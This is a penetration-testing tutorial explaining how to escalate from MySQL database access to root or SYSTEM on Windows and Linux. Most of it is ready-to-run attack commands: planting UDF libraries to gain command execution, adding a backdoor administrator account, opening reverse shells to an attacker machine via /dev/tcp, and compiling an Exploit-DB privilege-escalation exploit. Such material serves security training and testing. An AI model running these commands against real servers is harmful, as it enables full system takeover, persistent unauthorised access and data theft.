MySql to System Root
MySql is a widely used open-source database. As we all know, a database is used to store large amounts of relational data. Databases also have the ability to execute system commands depending on who the database is running as.
Before we jump into exploiting MySql, let’s get familiar with a few basic commands:
Logging In
# Logging into to MySql with passwordmysql --host=192.168.1.101 -u root -p Password123!# Logging into MySql requesting a password promptmysql --host=192.168.1.101 -u root -p
Interacting With MySql
show databases;use <database name>show tables;select * from <table_name>
Dump All Databases
mysqldump -u root -p Password123! --all-databases > all_db_backup.sqlExploiting MySql
So in order to interact with the database, we need a password. This may be found in some sort of configuration file in the web root (/var/www) or something similar. Below is an example of something you might see in a config file containing a database password. See my Password Hunting post for more details on finding passwords.
Note: Keep in mind that MySql running with root privileges is different than a MySql user called root. They are two different things. You can have a user named bob on a Linux machine, and you can also have a user bob for logging to the MySql database to manage it, but they are not correlated at all.
After we have determined what the password for the database is (or maybe there is no password), we will have to customize the attack depending on the operating system we are using. I will give examples for Windows and Linux.
Windows 32/64 bit
If we are exploiting a 64 bit version of Windows, we need to download the 64 bit UDF library from the SQLMap program. You can download it here. The file should be called lib_mysqludf_sys.dll and we need to copy it to the target location. This could be in a user folder or a temp directory.
After we have successfully copied the file to the server, we will be running a series of commands to load the file into a new row, dump the contents of that row to a new file, create a new function to point to the new file, then execute the function and hopefully get SYSTEM. Below is the series of commands we will be running after connecting to MySql:
USE mysql;CREATE TABLE potato(line blob);INSERT INTO potato values(load_file('C://Users//Bob//Desktop//lib_mysqludf_sys.dll'));SELECT * FROM mysql.potato INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user hacker Password123! /add");SELECT sys_exec("net localgroup Administrators hacker /add");
This will add a new user hacker to the Administrators group on the computer. If we want to do this for a 32 bit Windows machine, the steps are the same but we need to download the 32 bit UDF library instead.
Linux
The steps are very similar for Linux. We need to download the UDF binary first. We are going to use the 64 bit UDF library for this example. You can download it here. For 32 bit machines, you can download the library here.
The file should be called lib_mysqludf_sys.so and we need to copy it to the target location. This could be in a user folder or the /tmp/ directory. We will then be issuing commands to load the file into a new row, dump the contents of that row to a new file, create a new function to point to the new file, then execute the function to get a reverse shell as root.
mysql> use mysql;mysql> create table potato(line blob);mysql> insert into potato values(load_file('/tmp/lib_mysqludf_sys.so'));mysql> select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so';mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';mysql> select sys_exec('bash -i >& /dev/tcp/192.168.1.99/443 0>&1');
Before running the last command, we should have a netcat listener up. We can run this on our Kali machine by typing in nc -nvlp 443 and we are assuming our IP address is 192.168.1.99 in this example. If all goes well, we should have a reverse shell back to our machine as root.
MySql 4x/5.0 Exploit
If there is a MySql server that is version 4.x to 5.0, there is a known exploit to get root on the system. The proof of concept code can be found here.
First, on our Kali machine we need to download the file from Exploit-DB and compile the code:
wget -O pizza.c https://www.exploit-db.com/download/1518gcc –g –shared –Wl,–soname,pizza.so –o pizza.so pizza.c –lc
Now we should have a .so file that we need to transfer to the target machine. Use your favorite file transfer method. Put it in the /tmp/ directory of the target machine for now.
Change the permissions of the file:
chmod 777 pizza.soNow login to the MySql Database:
mysql -u root -p Password123!Now we will follow the instructions in the exploit to trigger the vulnerability with our new .so file. Before running the commands make sure you have a netcat listener running on your Kali machine:
mysql> create table foo(line blob);mysql> insert into foo values(load_file(‘/tmp/pizza.so’));mysql> select * from foo into dumpfile ‘/usr/lib/mysql/plugin/pizza.so’;mysql> create function do_system returns integer soname ‘pizza.so’;mysql> select do_system(‘bash -i >& /dev/tcp/10.0.0.1/443 0>&1’);
The last command should run the reverse shell and you should now have root shell on your machine.
